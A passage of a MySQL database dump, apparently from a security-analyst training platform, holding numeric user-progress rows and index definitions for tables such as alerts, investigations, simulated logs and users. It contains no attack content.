(54, 150, 50, 2, 200, 1, '2026-01-17', '2025-12-29 21:45:59', '2026-01-17 03:00:52'),
(55, 50, 50, 1, 100, 1, '2026-03-09', '2026-03-09 12:47:21', '2026-03-09 12:47:21'),
(56, 350, 350, 4, 400, 1, '2026-03-11', '2025-12-31 07:27:18', '2026-03-11 06:19:11'),
(60, 50, 50, 1, 100, 1, '2026-02-16', '2026-01-02 00:57:21', '2026-02-16 06:05:42'),
(61, 0, 0, 1, 100, 0, NULL, '2026-01-02 06:48:50', '2026-01-02 06:48:50'),
(65, 270, 200, 3, 300, 1, '2026-03-11', '2026-01-06 06:48:50', '2026-03-11 19:58:17'),
(68, 0, 0, 1, 100, 0, NULL, '2026-01-07 16:01:15', '2026-01-07 16:01:15'),
(71, 0, 0, 1, 100, 0, NULL, '2026-01-10 06:39:37', '2026-01-10 06:39:37'),
(72, 0, 0, 1, 100, 0, NULL, '2026-01-10 14:15:16', '2026-01-10 14:15:16'),
(74, 600, 450, 7, 700, 1, '2026-02-27', '2026-01-12 06:24:51', '2026-02-27 19:08:05'),
(77, 520, 520, 6, 600, 3, '2026-01-16', '2026-01-14 00:44:07', '2026-01-15 21:01:36'),
(78, 1749, 1669, 18, 1800, 1, '2026-03-15', '2026-01-14 03:22:07', '2026-03-15 05:52:34'),
(79, 3275, 3275, 33, 3300, 1, '2026-02-25', '2026-01-15 22:39:00', '2026-02-24 21:52:12'),
(83, 50, 50, 1, 100, 1, '2026-01-16', '2026-01-16 00:10:35', '2026-01-16 00:10:35'),
(84, 805, 805, 9, 900, 1, '2026-03-16', '2026-01-16 00:13:21', '2026-03-15 21:49:58'),
(85, 50, 50, 1, 100, 1, '2026-01-16', '2026-01-16 13:33:38', '2026-01-16 13:33:38'),
(86, 120, 120, 2, 200, 1, '2026-02-06', '2026-01-16 18:34:30', '2026-02-06 11:29:56'),
(88, 70, 70, 1, 100, 1, '2026-01-18', '2026-01-18 15:26:50', '2026-01-18 15:27:30'),
(89, 50, 50, 1, 100, 1, '2026-01-20', '2026-01-20 00:26:18', '2026-01-20 00:26:18'),
(91, 50, 50, 1, 100, 1, '2026-01-20', '2026-01-20 10:38:45', '2026-01-20 10:38:45'),
(93, 100, 100, 2, 200, 2, '2026-01-21', '2026-01-20 20:57:26', '2026-01-20 21:13:49'),
(94, 200, 200, 3, 300, 1, '2026-02-16', '2026-01-21 01:57:28', '2026-02-16 15:32:11'),
(95, 150, 150, 2, 200, 2, '2026-02-15', '2026-01-21 17:18:24', '2026-02-15 11:08:46'),
(96, 50, 50, 1, 100, 1, '2026-01-22', '2026-01-22 04:14:21', '2026-01-22 04:14:21'),
(97, 50, 50, 1, 100, 1, '2026-01-25', '2026-01-25 05:05:00', '2026-01-25 05:05:01'),
(98, 50, 50, 1, 100, 1, '2026-01-25', '2026-01-25 08:18:33', '2026-01-25 08:18:33'),
(99, 2140, 2090, 22, 2200, 2, '2026-03-15', '2026-01-25 15:13:11', '2026-03-15 17:43:57'),
(100, 250, 250, 3, 300, 1, '2026-02-08', '2026-01-25 19:37:32', '2026-02-08 19:28:00'),
(101, 90, 90, 1, 100, 1, '2026-01-26', '2026-01-25 21:04:12', '2026-01-26 06:11:41'),
(102, 2022, 2022, 21, 2100, 2, '2026-03-16', '2026-01-25 21:54:59', '2026-03-15 21:15:35'),
(103, 50, 50, 1, 100, 1, '2026-01-26', '2026-01-26 01:37:19', '2026-01-26 01:37:19'),
(105, 50, 50, 1, 100, 1, '2026-01-26', '2026-01-26 03:44:00', '2026-01-26 03:44:00'),
(106, 50, 50, 1, 100, 1, '2026-01-26', '2026-01-26 04:15:35', '2026-01-26 04:15:35'),
(107, 520, 520, 6, 600, 1, '2026-02-12', '2026-01-27 19:45:52', '2026-02-12 01:40:19'),
(108, 100, 100, 2, 200, 1, '2026-02-17', '2026-01-27 19:55:50', '2026-02-17 17:15:33'),
(109, 4195, 3915, 42, 4200, 4, '2026-03-15', '2026-01-27 21:07:58', '2026-03-15 10:13:00'),
(110, 50, 50, 1, 100, 1, '2026-01-30', '2026-01-30 13:36:10', '2026-01-30 13:36:10'),
(111, 50, 50, 1, 100, 1, '2026-01-30', '2026-01-30 14:52:10', '2026-01-30 14:52:10'),
(112, 200, 200, 3, 300, 1, '2026-02-23', '2026-01-30 14:53:31', '2026-02-23 01:29:57'),
(113, 100, 100, 2, 200, 1, '2026-02-21', '2026-01-30 14:55:30', '2026-02-21 20:55:48'),
(114, 110, 110, 2, 200, 1, '2026-02-12', '2026-01-30 14:57:29', '2026-02-11 23:41:56'),
(115, 50, 50, 1, 100, 1, '2026-01-31', '2026-01-31 12:37:59', '2026-01-31 12:37:59'),
(116, 50, 50, 1, 100, 1, '2026-02-01', '2026-02-01 09:07:06', '2026-02-01 09:07:06'),
(117, 50, 50, 1, 100, 1, '2026-02-01', '2026-02-01 16:19:55', '2026-02-01 16:19:55'),
(118, 260, 260, 3, 300, 1, '2026-02-18', '2026-02-01 16:22:10', '2026-02-18 00:58:34'),
(119, 390, 390, 4, 400, 2, '2026-02-19', '2026-02-01 16:28:52', '2026-02-18 21:29:28'),
(120, 100, 100, 2, 200, 1, '2026-02-18', '2026-02-01 16:29:26', '2026-02-18 00:21:52'),
(122, 50, 50, 1, 100, 1, '2026-02-01', '2026-02-01 19:54:00', '2026-02-01 19:54:00'),
(123, 150, 150, 2, 200, 1, '2026-02-07', '2026-02-02 10:07:00', '2026-02-07 06:51:47'),
(124, 50, 50, 1, 100, 1, '2026-02-02', '2026-02-02 10:09:51', '2026-02-02 10:09:51'),
(125, 50, 50, 1, 100, 1, '2026-02-04', '2026-02-04 01:33:49', '2026-02-04 01:33:49'),
(126, 250, 250, 3, 300, 1, '2026-03-09', '2026-02-04 22:06:23', '2026-03-09 10:20:56'),
(127, 50, 50, 1, 100, 1, '2026-02-05', '2026-02-05 17:48:44', '2026-02-05 17:48:44'),
(128, 50, 50, 1, 100, 1, '2026-02-07', '2026-02-07 01:17:20', '2026-02-07 01:17:20'),
(129, 50, 50, 1, 100, 1, '2026-02-08', '2026-02-07 21:51:40', '2026-02-07 21:51:40'),
(131, 50, 50, 1, 100, 1, '2026-02-08', '2026-02-08 08:16:27', '2026-02-08 08:16:27'),
(133, 150, 150, 2, 200, 1, '2026-02-11', '2026-02-08 16:07:42', '2026-02-11 02:31:48'),
(135, 50, 50, 1, 100, 1, '2026-02-08', '2026-02-08 17:42:25', '2026-02-08 17:42:25'),
(136, 50, 50, 1, 100, 1, '2026-02-10', '2026-02-09 22:07:26', '2026-02-09 22:07:26'),
(137, 150, 150, 2, 200, 1, '2026-02-13', '2026-02-10 12:44:46', '2026-02-12 23:42:16'),
(138, 50, 50, 1, 100, 1, '2026-02-11', '2026-02-11 17:02:51', '2026-02-11 17:02:51'),
(140, 100, 100, 2, 200, 1, '2026-02-24', '2026-02-11 17:05:52', '2026-02-24 04:15:59'),
(141, 100, 100, 2, 200, 2, '2026-02-13', '2026-02-12 03:16:21', '2026-02-13 19:00:17'),
(142, 210, 210, 3, 300, 1, '2026-03-07', '2026-02-14 06:26:33', '2026-03-07 05:07:09'),
(143, 100, 100, 2, 200, 2, '2026-02-15', '2026-02-14 08:38:59', '2026-02-15 16:30:47'),
(144, 225, 225, 3, 300, 1, '2026-03-13', '2026-02-14 09:29:42', '2026-03-13 03:49:54'),
(145, 50, 50, 1, 100, 1, '2026-02-14', '2026-02-14 09:37:01', '2026-02-14 09:37:01'),
(146, 100, 100, 2, 200, 2, '2026-02-15', '2026-02-14 15:55:20', '2026-02-15 18:44:12'),
(147, 402, 392, 5, 500, 1, '2026-03-15', '2026-02-14 16:15:24', '2026-03-15 00:47:45'),
(148, 190, 190, 2, 200, 2, '2026-02-15', '2026-02-14 17:00:20', '2026-02-15 04:27:04'),
(149, 70, 70, 1, 100, 1, '2026-02-14', '2026-02-14 17:53:24', '2026-02-14 17:55:56'),
(150, 250, 250, 3, 300, 1, '2026-03-13', '2026-02-14 18:33:44', '2026-03-13 03:10:28'),
(151, 132, 132, 2, 200, 1, '2026-03-15', '2026-02-14 19:16:09', '2026-03-15 04:17:41'),
(152, 50, 50, 1, 100, 1, '2026-02-15', '2026-02-15 01:20:20', '2026-02-15 01:20:20'),
(153, 50, 50, 1, 100, 1, '2026-02-15', '2026-02-15 01:39:04', '2026-02-15 01:39:04'),
(154, 110, 100, 2, 200, 1, '2026-02-20', '2026-02-15 03:41:01', '2026-02-20 00:24:58'),
(155, 50, 50, 1, 100, 1, '2026-02-15', '2026-02-15 11:06:27', '2026-02-15 11:06:27'),
(156, 75, 75, 1, 100, 1, '2026-02-15', '2026-02-15 20:43:36', '2026-02-15 20:45:59'),
(157, 320, 320, 4, 400, 1, '2026-03-10', '2026-02-15 21:26:27', '2026-03-10 04:57:36'),
(158, 50, 50, 1, 100, 1, '2026-02-16', '2026-02-15 23:21:17', '2026-02-15 23:21:17'),
(159, 50, 50, 1, 100, 1, '2026-02-16', '2026-02-15 23:22:19', '2026-02-15 23:22:19'),
(160, 170, 130, 2, 200, 1, '2026-03-09', '2026-02-15 23:40:38', '2026-03-09 17:44:32'),
(162, 50, 50, 1, 100, 1, '2026-02-16', '2026-02-16 12:06:12', '2026-02-16 12:06:12'),
(163, 110, 110, 2, 200, 1, '2026-02-16', '2026-02-16 12:22:16', '2026-02-16 12:26:00'),
(164, 120, 100, 2, 200, 1, '2026-02-25', '2026-02-16 14:54:13', '2026-02-24 21:58:12'),
(165, 6515, 6355, 66, 6600, 2, '2026-02-24', '2026-02-16 17:14:52', '2026-02-24 19:53:49'),
(166, 100, 100, 2, 200, 1, '2026-02-19', '2026-02-17 15:29:06', '2026-02-19 07:34:12'),
(168, 50, 50, 1, 100, 1, '2026-02-18', '2026-02-18 06:47:47', '2026-02-18 06:47:47'),
(169, 50, 50, 1, 100, 1, '2026-02-18', '2026-02-18 07:17:16', '2026-02-18 07:17:16'),
(170, 65, 65, 1, 100, 1, '2026-02-18', '2026-02-18 08:19:47', '2026-02-18 08:21:32'),
(171, 50, 50, 1, 100, 1, '2026-02-18', '2026-02-18 09:49:54', '2026-02-18 09:49:54'),
(172, 140, 140, 2, 200, 1, '2026-03-05', '2026-02-18 11:05:58', '2026-03-05 11:51:32'),
(173, 460, 400, 5, 500, 1, '2026-03-13', '2026-02-18 12:13:49', '2026-03-13 10:48:07'),
(174, 345, 265, 4, 400, 1, '2026-02-26', '2026-02-18 15:07:08', '2026-02-26 05:00:25'),
(175, 130, 120, 2, 200, 1, '2026-02-20', '2026-02-18 15:40:02', '2026-02-20 02:08:28'),
(176, 130, 50, 1, 100, 1, '2026-02-19', '2026-02-19 03:47:11', '2026-02-19 03:48:50'),
(177, 3401, 3261, 35, 3500, 1, '2026-03-15', '2026-02-19 04:01:45', '2026-03-15 04:30:01'),
(178, 200, 200, 3, 300, 1, '2026-03-03', '2026-02-19 05:19:13', '2026-03-03 08:38:17'),
(179, 175, 175, 2, 200, 1, '2026-03-01', '2026-02-19 12:58:35', '2026-03-01 18:40:25'),
(180, 1582, 1232, 16, 1600, 1, '2026-03-16', '2026-02-19 15:44:06', '2026-03-16 03:21:28'),
(181, 100, 100, 2, 200, 1, '2026-02-22', '2026-02-20 03:04:07', '2026-02-22 02:58:42'),
(182, 215, 215, 3, 300, 1, '2026-03-13', '2026-02-20 03:10:13', '2026-03-13 02:31:12'),
(183, 130, 130, 2, 200, 1, '2026-02-20', '2026-02-20 03:54:45', '2026-02-20 04:23:32'),
(184, 100, 100, 2, 200, 1, '2026-03-02', '2026-02-20 07:52:54', '2026-03-02 17:01:07'),
(185, 50, 50, 1, 100, 1, '2026-02-20', '2026-02-20 08:58:20', '2026-02-20 08:58:20'),
(186, 160, 140, 2, 200, 2, '2026-02-21', '2026-02-20 16:30:40', '2026-02-21 05:09:14'),
(187, 270, 230, 3, 300, 1, '2026-03-15', '2026-02-21 03:05:54', '2026-03-15 03:17:42'),
(188, 110, 80, 2, 200, 1, '2026-02-21', '2026-02-21 15:36:57', '2026-02-21 20:54:31'),
(189, 310, 310, 4, 400, 1, '2026-03-09', '2026-02-21 18:34:58', '2026-03-08 22:12:29'),
(191, 50, 50, 1, 100, 1, '2026-02-22', '2026-02-22 01:39:31', '2026-02-22 01:39:31'),
(193, 70, 70, 1, 100, 1, '2026-02-22', '2026-02-22 18:24:07', '2026-02-22 18:24:56'),
(194, 70, 70, 1, 100, 1, '2026-02-23', '2026-02-23 03:17:17', '2026-02-23 03:21:52'),
(195, 725, 635, 8, 800, 3, '2026-03-11', '2026-02-23 16:00:49', '2026-03-11 12:06:09'),
(196, 600, 540, 7, 700, 1, '2026-02-27', '2026-02-23 17:35:01', '2026-02-27 06:52:20'),
(197, 100, 100, 2, 200, 1, '2026-02-25', '2026-02-23 18:53:24', '2026-02-25 17:48:36'),
(198, 50, 50, 1, 100, 1, '2026-02-24', '2026-02-23 23:51:02', '2026-02-23 23:51:02'),
(199, 750, 750, 8, 800, 4, '2026-03-15', '2026-02-23 23:52:04', '2026-03-15 20:17:58'),
(201, 50, 50, 1, 100, 1, '2026-02-24', '2026-02-24 07:41:32', '2026-02-24 07:41:32'),
(202, 265, 255, 3, 300, 1, '2026-03-02', '2026-02-24 15:31:24', '2026-03-02 14:56:11'),
(203, 75, 75, 1, 100, 1, '2026-02-24', '2026-02-24 19:39:58', '2026-02-24 19:48:18'),
(204, 65, 65, 1, 100, 1, '2026-02-24', '2026-02-24 20:47:37', '2026-02-24 20:50:34'),
(205, 50, 50, 1, 100, 1, '2026-02-25', '2026-02-24 21:22:17', '2026-02-24 21:22:17'),
(208, 140, 130, 2, 200, 1, '2026-02-25', '2026-02-25 10:19:29', '2026-02-25 10:40:02'),
(209, 210, 190, 3, 300, 1, '2026-02-27', '2026-02-25 11:04:35', '2026-02-27 04:03:26'),
(210, 235, 235, 3, 300, 1, '2026-03-05', '2026-02-25 20:27:58', '2026-03-04 23:46:33'),
(211, 105, 105, 2, 200, 1, '2026-03-01', '2026-02-26 20:39:14', '2026-03-01 10:11:04'),
(212, 65, 65, 1, 100, 1, '2026-02-26', '2026-02-26 20:55:15', '2026-02-26 20:56:54'),
(213, 100, 100, 2, 200, 1, '2026-03-15', '2026-02-26 21:11:46', '2026-03-15 20:21:01'),
(214, 310, 310, 4, 400, 2, '2026-03-16', '2026-02-27 05:57:14', '2026-03-16 01:43:14'),
(216, 130, 130, 2, 200, 1, '2026-03-06', '2026-02-27 16:15:15', '2026-03-06 11:05:56'),
(217, 200, 200, 3, 300, 2, '2026-03-04', '2026-02-27 23:39:31', '2026-03-04 16:47:46'),
(219, 175, 175, 2, 200, 1, '2026-02-28', '2026-02-28 10:30:04', '2026-02-28 10:31:21'),
(220, 790, 780, 8, 800, 1, '2026-03-13', '2026-02-28 10:37:15', '2026-03-13 01:30:22'),
(221, 150, 150, 2, 200, 3, '2026-03-03', '2026-03-01 01:54:20', '2026-03-02 23:10:50'),
(223, 130, 130, 2, 200, 1, '2026-03-01', '2026-03-01 15:34:15', '2026-03-01 15:57:12'),
(224, 50, 50, 1, 100, 1, '2026-03-01', '2026-03-01 15:54:53', '2026-03-01 15:54:53'),
(225, 3565, 4165, 36, 3600, 2, '2026-03-16', '2026-03-02 00:59:56', '2026-03-16 03:28:00'),
(226, 50, 50, 1, 100, 1, '2026-03-02', '2026-03-02 05:26:28', '2026-03-02 05:26:28'),
(227, 50, 50, 1, 100, 1, '2026-03-02', '2026-03-02 08:22:45', '2026-03-02 08:22:45'),
(228, 55, 55, 1, 100, 1, '2026-03-02', '2026-03-02 11:52:48', '2026-03-02 11:54:00'),
(229, 775, 715, 8, 800, 1, '2026-03-14', '2026-03-02 14:11:54', '2026-03-14 18:05:20'),
(230, 352, 332, 4, 400, 1, '2026-03-09', '2026-03-02 16:47:27', '2026-03-09 17:32:28'),
(231, 80, 50, 1, 100, 1, '2026-03-02', '2026-03-02 20:15:37', '2026-03-02 20:20:57'),
(232, 6610, 7010, 67, 6700, 4, '2026-03-16', '2026-03-03 03:13:42', '2026-03-16 02:27:14'),
(233, 50, 50, 1, 100, 1, '2026-03-03', '2026-03-03 09:48:24', '2026-03-03 09:48:24'),
(234, 302, 302, 4, 400, 2, '2026-03-06', '2026-03-03 19:39:00', '2026-03-06 15:03:21'),
(235, 50, 50, 1, 100, 1, '2026-03-03', '2026-03-03 20:12:52', '2026-03-03 20:12:52'),
(236, 60, 60, 1, 100, 1, '2026-03-04', '2026-03-03 22:19:11', '2026-03-03 23:27:14'),
(237, 390, 390, 4, 400, 1, '2026-03-13', '2026-03-03 23:25:52', '2026-03-13 16:21:54'),
(238, 120, 120, 2, 200, 1, '2026-03-15', '2026-03-04 15:20:05', '2026-03-15 13:26:25'),
(240, 85, 55, 1, 100, 1, '2026-03-04', '2026-03-04 09:32:22', '2026-03-04 09:38:40'),
(241, 50, 50, 1, 100, 1, '2026-03-04', '2026-03-04 16:22:00', '2026-03-04 16:22:00'),
(243, 50, 50, 1, 100, 1, '2026-03-04', '2026-03-04 19:33:29', '2026-03-04 19:33:29'),
(244, 50, 50, 1, 100, 1, '2026-03-04', '2026-03-04 20:19:50', '2026-03-04 20:19:50'),
(245, 50, 50, 1, 100, 1, '2026-03-05', '2026-03-05 04:55:28', '2026-03-05 04:55:28'),
(246, 50, 50, 1, 100, 1, '2026-03-05', '2026-03-05 07:51:19', '2026-03-05 07:51:19'),
(247, 50, 50, 1, 100, 1, '2026-03-05', '2026-03-05 11:37:09', '2026-03-05 11:37:09'),
(248, 205, 205, 3, 300, 2, '2026-03-14', '2026-03-05 17:39:49', '2026-03-13 21:29:50'),
(250, 50, 50, 1, 100, 1, '2026-03-06', '2026-03-06 02:52:54', '2026-03-06 02:52:54'),
(251, 100, 100, 2, 200, 1, '2026-03-10', '2026-03-06 04:45:14', '2026-03-10 05:12:57'),
(254, 50, 50, 1, 100, 1, '2026-03-06', '2026-03-06 07:04:38', '2026-03-06 07:04:38'),
(256, 50, 50, 1, 100, 1, '2026-03-06', '2026-03-06 08:30:52', '2026-03-06 08:30:52'),
(257, 65, 65, 1, 100, 1, '2026-03-06', '2026-03-06 10:11:37', '2026-03-06 10:16:04'),
(258, 50, 50, 1, 100, 1, '2026-03-06', '2026-03-06 15:19:11', '2026-03-06 15:19:11'),
(259, 260, 260, 3, 300, 4, '2026-03-10', '2026-03-06 21:08:25', '2026-03-09 23:13:45'),
(260, 1290, 1290, 13, 1300, 2, '2026-03-16', '2026-03-07 10:20:12', '2026-03-15 21:27:59'),
(261, 200, 200, 3, 300, 1, '2026-03-12', '2026-03-07 08:27:44', '2026-03-12 08:25:19'),
(262, 55, 55, 1, 100, 1, '2026-03-08', '2026-03-08 18:31:44', '2026-03-08 18:33:57'),
(263, 90, 90, 1, 100, 1, '2026-03-09', '2026-03-08 22:31:00', '2026-03-08 22:31:54'),
(264, 162, 132, 2, 200, 1, '2026-03-09', '2026-03-09 09:41:22', '2026-03-09 09:48:51'),
(265, 50, 50, 1, 100, 1, '2026-03-09', '2026-03-09 11:10:06', '2026-03-09 11:10:06'),
(266, 520, 500, 6, 600, 2, '2026-03-15', '2026-03-09 12:09:26', '2026-03-15 14:35:10'),
(267, 57, 57, 1, 100, 1, '2026-03-09', '2026-03-09 19:38:56', '2026-03-09 19:39:56'),
(268, 50, 50, 1, 100, 1, '2026-03-10', '2026-03-09 23:49:10', '2026-03-09 23:49:10'),
(269, 125, 105, 2, 200, 1, '2026-03-10', '2026-03-10 03:37:14', '2026-03-10 03:44:48'),
(270, 50, 50, 1, 100, 1, '2026-03-10', '2026-03-10 04:25:37', '2026-03-10 04:25:37'),
(271, 50, 50, 1, 100, 1, '2026-03-10', '2026-03-10 05:08:04', '2026-03-10 05:08:04'),
(272, 50, 50, 1, 100, 1, '2026-03-10', '2026-03-10 11:07:44', '2026-03-10 11:07:44'),
(273, 95, 95, 1, 100, 1, '2026-03-10', '2026-03-10 13:55:18', '2026-03-10 13:59:07'),
(274, 155, 155, 2, 200, 2, '2026-03-11', '2026-03-10 20:57:39', '2026-03-10 21:04:16'),
(275, 85, 85, 1, 100, 1, '2026-03-11', '2026-03-11 02:54:27', '2026-03-11 10:53:17'),
(276, 55, 55, 1, 100, 1, '2026-03-11', '2026-03-11 08:19:33', '2026-03-11 08:21:05'),
(277, 50, 50, 1, 100, 1, '2026-03-11', '2026-03-11 11:43:14', '2026-03-11 11:43:14'),
(278, 120, 120, 2, 200, 1, '2026-03-11', '2026-03-11 13:28:04', '2026-03-11 13:29:09'),
(279, 70, 50, 1, 100, 1, '2026-03-11', '2026-03-11 13:41:15', '2026-03-11 13:43:29'),
(281, 50, 50, 1, 100, 1, '2026-03-12', '2026-03-11 22:36:22', '2026-03-11 22:36:22'),
(282, 50, 50, 1, 100, 1, '2026-03-12', '2026-03-11 23:46:34', '2026-03-11 23:46:34'),
(283, 2250, 3250, 23, 2300, 2, '2026-03-16', '2026-03-11 23:58:52', '2026-03-15 22:34:59'),
(284, 100, 80, 1, 100, 1, '2026-03-12', '2026-03-12 04:41:56', '2026-03-12 04:50:23'),
(285, 75, 65, 1, 100, 1, '2026-03-12', '2026-03-12 07:19:13', '2026-03-12 07:40:14'),
(287, 100, 100, 2, 200, 1, '2026-03-14', '2026-03-12 08:39:19', '2026-03-14 16:22:04'),
(288, 285, 285, 3, 300, 2, '2026-03-13', '2026-03-12 09:30:46', '2026-03-13 12:22:50'),
(289, 65, 65, 1, 100, 1, '2026-03-12', '2026-03-12 10:05:43', '2026-03-12 20:33:07'),
(290, 80, 80, 1, 100, 1, '2026-03-12', '2026-03-12 13:49:37', '2026-03-12 14:11:40'),
(291, 100, 100, 2, 200, 1, '2026-03-16', '2026-03-13 00:33:31', '2026-03-16 03:17:10'),
(292, 100, 100, 2, 200, 2, '2026-03-14', '2026-03-13 09:01:21', '2026-03-13 21:35:44'),
(294, 65, 65, 1, 100, 1, '2026-03-14', '2026-03-14 04:14:34', '2026-03-14 04:15:23'),
(295, 80, 80, 1, 100, 1, '2026-03-14', '2026-03-14 06:24:03', '2026-03-14 06:30:44'),
(296, 197, 177, 2, 200, 2, '2026-03-15', '2026-03-14 16:24:44', '2026-03-14 21:29:32'),
(297, 105, 105, 2, 200, 2, '2026-03-15', '2026-03-14 16:34:44', '2026-03-15 10:44:23'),
(298, 100, 100, 2, 200, 2, '2026-03-15', '2026-03-14 18:38:45', '2026-03-14 21:07:17'),
(299, 150, 150, 2, 200, 1, '2026-03-15', '2026-03-14 21:38:06', '2026-03-14 21:43:38'),
(300, 50, 50, 1, 100, 1, '2026-03-15', '2026-03-14 23:29:20', '2026-03-14 23:29:20'),
(301, 130, 130, 2, 200, 1, '2026-03-15', '2026-03-15 07:46:35', '2026-03-15 07:54:52'),
(302, 50, 50, 1, 100, 1, '2026-03-15', '2026-03-15 10:47:32', '2026-03-15 10:47:33'),
(303, 140, 140, 2, 200, 1, '2026-03-15', '2026-03-15 17:12:46', '2026-03-15 17:37:43'),
(304, 50, 50, 1, 100, 1, '2026-03-15', '2026-03-15 17:28:59', '2026-03-15 17:28:59'),
(305, 140, 130, 2, 200, 1, '2026-03-15', '2026-03-15 17:51:17', '2026-03-15 17:57:35'),
(306, 50, 50, 1, 100, 1, '2026-03-15', '2026-03-15 18:10:23', '2026-03-15 18:10:23'),
(307, 70, 70, 1, 100, 1, '2026-03-15', '2026-03-15 18:38:43', '2026-03-15 18:44:55'),
(308, 50, 50, 1, 100, 1, '2026-03-16', '2026-03-16 01:42:42', '2026-03-16 01:42:42');

--
-- Indexes for dumped tables
--

--
-- Indexes for table `alerts`
--
ALTER TABLE `alerts`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `alert_grades`
--
ALTER TABLE `alert_grades`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `badges`
--
ALTER TABLE `badges`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `beta_signups`
--
ALTER TABLE `beta_signups`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_email` (`email`);

--
-- Indexes for table `blog_posts`
--
ALTER TABLE `blog_posts`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `slug` (`slug`);

--
-- Indexes for table `email_logs`
--
ALTER TABLE `email_logs`
  ADD PRIMARY KEY (`id`),
  ADD KEY `recipient_email` (`recipient_email`),
  ADD KEY `sent_at` (`sent_at`),
  ADD KEY `user_id` (`user_id`);

--
-- Indexes for table `feedbacks`
--
ALTER TABLE `feedbacks`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `investigations`
--
ALTER TABLE `investigations`
  ADD PRIMARY KEY (`id`),
  ADD KEY `user_id` (`user_id`),
  ADD KEY `alert_id` (`alert_id`);

--
-- Indexes for table `investigation_notes`
--
ALTER TABLE `investigation_notes`
  ADD PRIMARY KEY (`id`),
  ADD KEY `user_id` (`user_id`),
  ADD KEY `alert_id` (`alert_id`);

--
-- Indexes for table `learning_paths`
--
ALTER TABLE `learning_paths`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `lesson_content`
--
ALTER TABLE `lesson_content`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_task_content` (`task_id`);

--
-- Indexes for table `lesson_questions`
--
ALTER TABLE `lesson_questions`
  ADD PRIMARY KEY (`id`),
  ADD KEY `idx_task_order` (`task_id`,`question_order`);

--
-- Indexes for table `mobile_lesson_completions`
--
ALTER TABLE `mobile_lesson_completions`
  ADD PRIMARY KEY (`id`),
  ADD KEY `idx_user_lesson` (`user_id`,`lesson_id`),
  ADD KEY `idx_user_date` (`user_id`,`completed_at`);

--
-- Indexes for table `modules`
--
ALTER TABLE `modules`
  ADD PRIMARY KEY (`id`),
  ADD KEY `prerequisite_module_id` (`prerequisite_module_id`),
  ADD KEY `idx_modules_path` (`learning_path_id`);

--
-- Indexes for table `newsletter_subscribers`
--
ALTER TABLE `newsletter_subscribers`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `email` (`email`);

--
-- Indexes for table `notifications`
--
ALTER TABLE `notifications`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `operations`
--
ALTER TABLE `operations`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `operation_alerts`
--
ALTER TABLE `operation_alerts`
  ADD PRIMARY KEY (`id`),
  ADD KEY `operation_id` (`operation_id`),
  ADD KEY `alert_id` (`alert_id`);

--
-- Indexes for table `organizations`
--
ALTER TABLE `organizations`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `slug` (`slug`),
  ADD KEY `idx_org_slug` (`slug`),
  ADD KEY `idx_org_owner` (`owner_id`);

--
-- Indexes for table `organization_invites`
--
ALTER TABLE `organization_invites`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `token` (`token`),
  ADD KEY `organization_id` (`organization_id`),
  ADD KEY `invited_by` (`invited_by`),
  ADD KEY `idx_invite_token` (`token`),
  ADD KEY `idx_invite_email` (`email`);

--
-- Indexes for table `organization_members`
--
ALTER TABLE `organization_members`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_org_user` (`organization_id`,`user_id`),
  ADD KEY `invited_by` (`invited_by`),
  ADD KEY `idx_member_org` (`organization_id`),
  ADD KEY `idx_member_user` (`user_id`);

--
-- Indexes for table `password_resets`
--
ALTER TABLE `password_resets`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `simulated_logs`
--
ALTER TABLE `simulated_logs`
  ADD PRIMARY KEY (`id`),
  ADD KEY `idx_timestamp` (`timestamp`),
  ADD KEY `idx_source_ip` (`source_ip`),
  ADD KEY `idx_dest_ip` (`dest_ip`),
  ADD KEY `idx_index_name` (`index_name`);

--
-- Indexes for table `student_domains`
--
ALTER TABLE `student_domains`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `domain` (`domain`);

--
-- Indexes for table `system_settings`
--
ALTER TABLE `system_settings`
  ADD PRIMARY KEY (`key`);

--
-- Indexes for table `tasks`
--
ALTER TABLE `tasks`
  ADD PRIMARY KEY (`id`),
  ADD KEY `idx_tasks_module` (`module_id`),
  ADD KEY `fk_task_alert` (`alert_id`);

--
-- Indexes for table `users`
--
ALTER TABLE `users`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `email` (`email`),
  ADD UNIQUE KEY `username` (`username`),
  ADD UNIQUE KEY `username_2` (`username`),
  ADD UNIQUE KEY `username_3` (`username`),
  ADD UNIQUE KEY `username_4` (`username`),
  ADD UNIQUE KEY `username_5` (`username`),
  ADD UNIQUE KEY `username_6` (`username`),
  ADD UNIQUE KEY `username_7` (`username`),
  ADD UNIQUE KEY `username_8` (`username`),
  ADD UNIQUE KEY `username_9` (`username`),
  ADD UNIQUE KEY `username_10` (`username`),
  ADD UNIQUE KEY `username_11` (`username`),
  ADD UNIQUE KEY `username_12` (`username`),
  ADD UNIQUE KEY `username_13` (`username`),
  ADD UNIQUE KEY `username_14` (`username`),
  ADD UNIQUE KEY `username_15` (`username`),
  ADD UNIQUE KEY `username_16` (`username`),
  ADD UNIQUE KEY `username_17` (`username`),
  ADD UNIQUE KEY `username_18` (`username`),
  ADD UNIQUE KEY `username_19` (`username`),
  ADD UNIQUE KEY `username_20` (`username`),
  ADD UNIQUE KEY `username_21` (`username`),
  ADD UNIQUE KEY `username_22` (`username`),
  ADD UNIQUE KEY `username_23` (`username`),
  ADD UNIQUE KEY `username_24` (`username`),
  ADD UNIQUE KEY `username_25` (`username`),
  ADD UNIQUE KEY `username_26` (`username`),
  ADD UNIQUE KEY `username_27` (`username`),
  ADD UNIQUE KEY `username_28` (`username`),
  ADD UNIQUE KEY `username_29` (`username`),
  ADD UNIQUE KEY `username_30` (`username`),
  ADD UNIQUE KEY `username_31` (`username`),
